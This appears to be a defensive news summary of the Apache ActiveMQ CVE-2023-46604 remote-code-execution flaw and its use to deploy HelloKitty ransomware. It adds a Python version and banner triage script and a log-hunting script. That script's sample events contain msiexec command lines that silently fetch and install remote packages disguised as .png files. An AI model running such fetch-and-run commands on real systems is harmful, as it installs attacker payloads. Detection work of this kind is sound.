November 2, 2023 at 05:30AM
Researchers have identified a critical security flaw in the Apache ActiveMQ open-source message broker, tracked as CVE-2023-46604, that allows unauthenticated remote code execution, and it is already being exploited in the wild to deploy HelloKitty ransomware. The vulnerability carries the maximum CVSS score of 10.0 and is fixed in the current ActiveMQ releases; anyone running an exposed broker should update immediately.
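The Python helper below is an added example (not code from the article, the researchers or the Apache project). It classifies an ActiveMQ version string against the fixed releases named in the Apache advisory (5.15.16, 5.16.7, 5.17.6 and 5.18.3) and pulls the ProviderVersion out of the OpenWire handshake a broker sends when a client connects, which is how most scanners fingerprint exposed instances. The handshake sample is constructed, and two things are my assumptions rather than anything the article states: that the map value is encoded as a type byte 0x09 followed by a 2-byte length-prefixed string (ActiveMQ's MarshallingSupport layout as I read it), and how branches other than the four patched ones are treated.

```python
"""Triage helper for CVE-2023-46604 (Apache ActiveMQ OpenWire RCE).

Added example, not code from the article or the Apache project. Fixed
versions are taken from the Apache advisory; everything marked ASSUMPTION
is the author's reading and should be verified against a real broker.
"""
import re
from typing import Optional, Tuple

# First fixed release on each supported branch (from the Apache advisory).
FIXED = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}


def parse_version(text: str) -> Tuple[int, int, int]:
    """Turn '5.15.15' (optionally with a suffix such as '-SNAPSHOT') into (5, 15, 15)."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version: {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def is_vulnerable(version: str) -> bool:
    """True if this version still carries CVE-2023-46604."""
    v = parse_version(version)
    branch = v[:2]
    if branch in FIXED:
        return v < FIXED[branch]
    # ASSUMPTION: branches older than 5.15 never received a fix and are
    # treated as vulnerable; anything newer than 5.18 (6.0.0 shipped after
    # the fix) is treated as fixed.
    return branch < (5, 15)


# Constructed sample of what a broker sends on connect: a WireFormatInfo
# command carrying a properties map with ProviderName and ProviderVersion.
# Only the key/type/value encoding matters to the parser below; the outer
# framing bytes are filler, not an exact OpenWire frame.
SAMPLE_BANNER = (
    b"\x00\x00\x00\x48\x01ActiveMQ\x00\x00\x00\x0c\x01\x00\x00\x00\x2b"
    b"\x00\x00\x00\x02"                       # map with two entries
    b"\x00\x0cProviderName\x09\x00\x08ActiveMQ"
    b"\x00\x0fProviderVersion\x09\x00\x075.15.15"
)


def version_from_banner(data: bytes) -> Optional[str]:
    """Extract ProviderVersion from raw OpenWire handshake bytes.

    ASSUMPTION about the map encoding: each value is a type byte (0x09 for
    string) followed by a 2-byte big-endian length and UTF-8 text.
    """
    key = b"ProviderVersion"
    i = data.find(key)
    if i < 0:
        return None
    p = i + len(key)
    if len(data) < p + 3 or data[p] != 0x09:
        return None
    n = int.from_bytes(data[p + 1:p + 3], "big")
    value = data[p + 3:p + 3 + n]
    if len(value) != n:
        return None
    return value.decode("utf-8", "replace")


def triage_banner(data: bytes) -> Tuple[Optional[str], Optional[bool]]:
    """(version, vulnerable) for a captured handshake; (None, None) if unparseable."""
    ver = version_from_banner(data)
    if ver is None:
        return None, None
    try:
        return ver, is_vulnerable(ver)
    except ValueError:
        return ver, None


if __name__ == "__main__":
    for v in ("5.15.15", "5.15.16", "5.18.2", "5.18.3", "5.14.5", "6.0.0"):
        print(f"{v:8} vulnerable={is_vulnerable(v)}")
    print("banner:", triage_banner(SAMPLE_BANNER))
```

To use it against a live broker, open a TCP socket to port 61616, read the first few hundred bytes the broker sends unprompted and pass them to triage_banner(); a broker that does not announce a version, or that reports a vulnerable one, should be treated as exposed until proven otherwise.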
Key Takeaways from the Meeting Notes:
– Cybersecurity researchers have identified a critical security flaw in the Apache ActiveMQ open-source message broker: an insecure deserialization bug in the OpenWire protocol handler (default broker port 61616) that lets an unauthenticated remote attacker make the broker instantiate arbitrary classes on its classpath, which leads to remote code execution.
– The vulnerability, tracked as CVE-2023-46604, carries the maximum CVSS severity score of 10.0.
– The HelloKitty ransomware family is believed to be involved in exploiting this vulnerability.
– The intrusions aim to deploy ransomware binaries on target systems.
– Apache has released a fix on each supported branch: 5.15.16, 5.16.7, 5.17.6 and 5.18.3. Upgrade to whichever of these matches the branch you run.
– A proof-of-concept exploit code and technical details are publicly available.
– In the observed intrusions the attacker abused the Windows Installer (msiexec) to fetch and load remote binaries disguised as image files (M2.png and M4.png) onto the compromised host.
– The loaded binaries behave as ransomware, encrypting files and appending the “.locked” extension.
– As of November 1, 2023, over 3,300 internet-accessible ActiveMQ instances are susceptible to CVE-2023-46604, with the majority located in China, the U.S., Germany, South Korea, and India.
– Users are strongly advised to upgrade to the fixed version for their branch, to keep the OpenWire port off untrusted networks, and to scan their environments for the indicators above (msiexec fetching remote .png packages, files renamed to .locked) rather than assuming an exposed broker was not already exploited.
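As an added example (not from the article or any of the researchers it cites), the Python below turns the indicators the article gives, the Windows Installer fetching remote packages named like images, into a small hunt over constructed process-creation records. The record layout (a flat key=value line with ParentImage, Image and CommandLine, in the spirit of a Sysmon event 1) and the Java-parent heuristic are my assumptions; map the field names to whatever your EDR or Sysmon pipeline emits.

```python
"""Hunt for the CVE-2023-46604 / HelloKitty post-exploitation pattern the
article describes: the ActiveMQ Java process driving the Windows Installer
(msiexec.exe) to fetch and run remote packages named M2.png / M4.png.

Added example, not code from the article or its sources. Records below are
constructed; the flat 'key=value; key=value' layout is an ASSUMPTION
standing in for whatever your EDR or Sysmon (event 1) pipeline emits.
"""
import re
from typing import Dict, List, Optional

# Constructed process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    r"ParentImage=C:\Program Files\Java\jre\bin\java.exe; Image=C:\Windows\System32\msiexec.exe; CommandLine=msiexec /q /i http://203.0.113.10/M2.png",
    r"ParentImage=C:\Program Files\Java\jre\bin\java.exe; Image=C:\Windows\System32\msiexec.exe; CommandLine=msiexec /q /i http://203.0.113.10/M4.png",
    r"ParentImage=C:\Windows\explorer.exe; Image=C:\Windows\System32\msiexec.exe; CommandLine=msiexec /i C:\Users\ops\Downloads\7zip.msi",
    r"ParentImage=C:\Program Files\Java\jre\bin\java.exe; Image=C:\Windows\System32\cmd.exe; CommandLine=cmd /c dir",
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
JAVA_PARENT_RE = re.compile(r"\\javaw?\.exe$", re.IGNORECASE)
KNOWN_NAMES = {"m2.png", "m4.png"}  # file names reported in the intrusions


def parse_event(line: str) -> Dict[str, str]:
    """Split 'k=v; k=v' into a dict (values may themselves contain '=')."""
    fields: Dict[str, str] = {}
    for part in line.split("; "):
        if "=" in part:
            k, v = part.split("=", 1)
            fields[k.strip()] = v.strip()
    return fields


def classify(ev: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding when msiexec pulls a package from a URL, else None."""
    image = ev.get("Image", "").lower()
    if not image.endswith("\\msiexec.exe"):
        return None
    m = URL_RE.search(ev.get("CommandLine", ""))
    if not m:
        return None  # local .msi installs are routine and not flagged
    url = m.group(0)
    name = url.rsplit("/", 1)[-1].lower()
    reasons = ["msiexec installing a package from a remote URL"]
    score = 1
    # ASSUMPTION: the broker runs as java.exe/javaw.exe, so a Java parent for
    # msiexec is the strongest sign that the ActiveMQ process itself spawned it.
    if JAVA_PARENT_RE.search(ev.get("ParentImage", "")):
        reasons.append("spawned by a Java process (ActiveMQ broker)")
        score += 2
    if name.endswith(".png"):
        reasons.append("MSI package disguised as an image")
        score += 1
    if name in KNOWN_NAMES:
        reasons.append(f"file name {name} matches a reported indicator")
        score += 1
    return {"url": url, "parent": ev.get("ParentImage", ""),
            "score": score, "reasons": reasons}


def hunt(lines: List[str]) -> List[Dict[str, object]]:
    """Run classify() over raw lines and return findings, highest score first."""
    findings = [f for f in (classify(parse_event(l)) for l in lines) if f]
    return sorted(findings, key=lambda f: f["score"], reverse=True)


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[score {f['score']}] {f['url']} <- {f['parent']}")
        for r in f["reasons"]:
            print("   -", r)
```

The local 7zip.msi install and the cmd.exe child are left alone on purpose: the signal is not msiexec itself but msiexec reaching out to a URL, with the Java parent and the .png disguise pushing the score up. Pair this with a file-system search for the .locked extension to confirm whether encryption already ran.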